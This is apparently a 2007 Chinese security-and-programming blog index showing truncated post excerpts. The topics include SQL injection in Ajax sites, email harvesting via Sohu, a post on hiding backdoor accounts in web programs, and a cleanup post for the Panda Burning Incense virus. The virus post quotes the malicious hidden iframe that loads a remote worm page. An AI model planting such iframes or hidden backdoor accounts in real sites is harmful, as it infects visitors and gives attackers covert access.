Ajax时代 SQL注入依然是隐患

作者: 日期: 2007 年 06 月 12 日 没有评论 | 3,555 views

来源:IT168 作者:空虚浪子心
【编者按】本文为了能够更为清晰的表述SQL注入在Ajax时代依然是安全隐患,在互联网上随机搜索到存在此类安全漏洞的网站。

这个例子也证明了SQL注入并非是Web1.0时代的专利,当新兴技术如Ajax发展促使互联网演进到2.0时代时,这种入侵方法依然存在,依然值得我们警惕。

同时我们郑重声明,本文作者寻找漏洞只是为了“依靠事实说话”而已,没真正入侵其服务器。我们承认较之以往,Ajax技术给我们带来的诸多便利,但这并不表明Ajax技术是万能的,用户再也不需要自己动手处理安全问题。

【IT168 专稿】 Ajax时代来[……]

read more–>

Ajax让Sohu邮箱成为垃圾邮件的帮凶

作者: 日期: 2007 年 06 月 06 日 没有评论 | 4,046 views

【IT168 专稿】今天,电子邮箱(E-mail)无疑已经成为大众通讯的工具;由于垃圾邮件泛滥,E-mail也成为信息安全的重大隐患之一。搜索到有效邮件地址成为垃圾邮件发送成功与否的决定要素。随着Ajax新兴技术在大型网站,如SOHU等得到应用,使得垃圾邮件制造者有机可乘。

现在浏览器端以 JavaScript 为核心,基于各种 Web 标准(即:早已完成标准化的XHTML/CSS/DOM/XML/XSLT 和正在进行标准化的XMLHTTP)的技术正在加速整合,Ajax 就是这一系列技术的一个统称。其关键在于对浏览器端的JavaScript、DHTML和与服务器异步通信的组合。使用A[……]

read more–>

AJAX带来了一些安全隐患…

作者: 日期: 2007 年 05 月 21 日 没有评论 | 3,601 views

改天闲了写篇文章…

使用AJAX的同胞们…用的时候注意啊…不要把某些隐私暴露了…

几个大网站都有的小小漏洞(影响不大).
可以暴出来一些东西.[……]

read more–>

郁闷…STRUTS标签.

作者: 日期: 2007 年 05 月 21 日 没有评论 | 3,499 views

下午一个项目,一访问某个JSP页面,SESSION里的USER竟然不存在了…气死了….

找原因…原来是

code:
<logic:iterate id="user" name="result" type="com.*****.vo.Usersvo">

这一句…

破STRUTS把USER临时生成在SESSION里.
我的SESSION在登陆的时候把user放了进去.
STRUTS使用完这个东西以后,把他干掉了…再找的时候,成为NULL…

太不应该了…[……]

read more–>

C://myheart//system32//Logfiles//W3SVC1//ex070415.log

作者: 日期: 2007 年 04 月 15 日 没有评论 | 3,948 views

#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2007-04-15 09:47:02
#Fields: time c-ip cs-method cs-uri-stem sc-status
08:02:37 127.0.0.1 GET /Default.htm 200 #start service
08:02:37 127.0.0.1 GET /images/myheart.jpg 200 #dark
09:00:12 127.0.0.1 GET /admin/login.aspx 500[……]

read more–>

在WEB程序中隐藏后门

作者: 日期: 2007 年 04 月 14 日 没有评论 | 5,169 views

作者: 空虚浪子心

  在很多商业程序中,程序员也许会出于某种目的,在程序中留下后门。我们不讨论这样做的目的是什么,只谈谈如何在程序中隐藏一个“终极后门”。

  首先给大家看一个例子,去年我写了一篇文章《对校园网的第二次安全检测,文中提到一个类似的后门:“…隐藏账户做后门!…如果不是我先拿到数据库,分析了一段时间以后才拿到程序,相信我也不会注意这个问题。某账户,在后台查询管理员账户的时候,他不出现,在管理员查询登陆和工作日志的时候,他自动消失…”。当时对JSP不了解,通过TOMCAT配置不正确漏洞下载了数据库,然后登陆后台,立刻就发现不对,知道有个后门,却不知道是什么原理,这次我们来把[……]

read more–>

struts-config.xml的配置以及过滤用户所有输入

作者: 日期: 2007 年 04 月 06 日 没有评论 | 5,182 views

struts-config.xml的配置笔记
/文 空虚浪子心
code:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE struts-config PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 1.1//EN" "http://jakarta.apache.org/struts/dtds/struts-config_1_1.dtd"&gt[……]

read more–>

最近忙…

作者: 日期: 2007 年 04 月 05 日 没有评论 | 4,378 views

最近忙…学JSP.
不长来。[……]

read more–>

喝酒

作者: 日期: 2007 年 02 月 03 日 没有评论 | 7,329 views

我知道现在很晕…
我知道现在写的东西明天获取会删除掉…或许会改掉.但是,我还要写.

现在很麻木,晕….可能现在写的东西词不答意,因为被灌酒了.
感觉他们都在灌我.也许现在写的东西明天就不想看,想删除掉.
但是我还是想说.

馨仪,我最爱的人,不知道该说什么,我现在一直想的都是你.我晕的很…凭意识去写的这篇BLOG.
高中的时候,我让自己晕的时候去人家楼底下喊我爱的女孩的名字.我就大声的喊.因为我感觉不到障碍.
现在我只想喊你的名字.馨仪….我只凭这一点意识叫你.唤醒你…
虽然不知道你什么时候才能上网.我好想你在身边…如果我们可以永远在一起…

今天,在我们一起[……]

read more–>

破熊猫…

作者: 日期: 2007 年 01 月 26 日 没有评论 | 4,483 views

前几天中了病毒…

EXE就不说了,我的大多EXE都有RAR的备份,竟然在我的asp.html,htm等文件中加入了
<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>

NND…
查了一下是熊猫烧香…文件太多,只好用C#写了个东西来替换…
给某些可怜的站长们.
可以在服务器上执行.

代码:

code:
using System;
using System.Drawing;
using System.Collections;
using System.Compone[……]

read more–>